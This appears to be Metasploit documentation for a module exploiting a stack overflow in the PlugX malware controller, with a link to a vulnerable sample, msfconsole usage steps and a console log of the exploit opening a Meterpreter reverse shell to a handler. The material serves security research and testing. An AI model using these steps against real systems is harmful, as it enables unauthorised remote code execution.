h00die
43 lines
1.4 KiB
Markdown
43 lines
1.4 KiB
Markdown
## Vulnerable Application
|
|
|
|
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
|
|
This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
|
|
|
|
A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
|
|
|
|
## Verification
|
|
|
|
1. Run the application
|
|
2. Start msfconsole
|
|
3. Do: `use exploit/windows/misc/plugx`
|
|
4. Do: `set rhost [ip]`
|
|
5. Do: `set target [target]`
|
|
6. Do: `exploit`
|
|
7. Click OK for the "PeDecodePacket" pop-up on the target
|
|
8. Get a shell
|
|
|
|
## Scenarios
|
|
|
|
### Windows XP SP3 with PlugX type 1
|
|
|
|
```
|
|
msf > use exploit/windows/misc/plugx
|
|
msf exploit(plugx) > set rhost 1.2.3.4
|
|
rhost => 1.2.3.4
|
|
msf exploit(plugx) > set target 1
|
|
target => 1
|
|
msf exploit(plugx) > set verbose true
|
|
verbose => true
|
|
msf exploit(plugx) > exploit
|
|
|
|
[*] Started reverse TCP handler on 1.2.3.99:4444
|
|
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
|
|
[*] 1.2.3.4:13579 - waiting for response
|
|
[*] Sending stage (956991 bytes) to 1.2.3.4
|
|
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
|
|
[*] 1.2.3.4:13579 - Server closed connection
|
|
|
|
meterpreter > getuid
|
|
Server username: WINXP\user
|
|
```
|